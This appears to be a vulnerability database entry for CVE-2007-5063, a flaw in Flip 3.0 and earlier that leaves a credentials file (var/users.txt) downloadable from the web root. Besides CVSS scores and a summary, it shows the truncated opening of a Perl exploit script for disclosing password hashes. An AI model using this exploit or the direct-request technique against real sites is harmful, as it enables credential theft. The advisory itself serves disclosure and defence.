5
CVSSv2

CVE-2007-5063

Published: 24/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Adam Scheinberg Flip 3.0 and previous versions stores sensitive information under the web root with insufficient access control, which allows remote malicious users to download a file containing login credentials via a direct request for var/users.txt.

Vulnerable Product Search on Vulmon Subscribe to Product

adam scheinberg flip

Exploits

#!/usr/bin/perl use strict; use IO::Socket; my $app = "Flip <= 30"; my $type = "Passwords Hash Disclosure"; my $author = "undefined1_"; my $vendor = "sourceforgenet/projects/flipsource"; banner(); my $server = shift || usage(); my $port = shift || usage(); if($server =~ /http:\/\//) { $server = substr($server,7); } my $path = "/" ...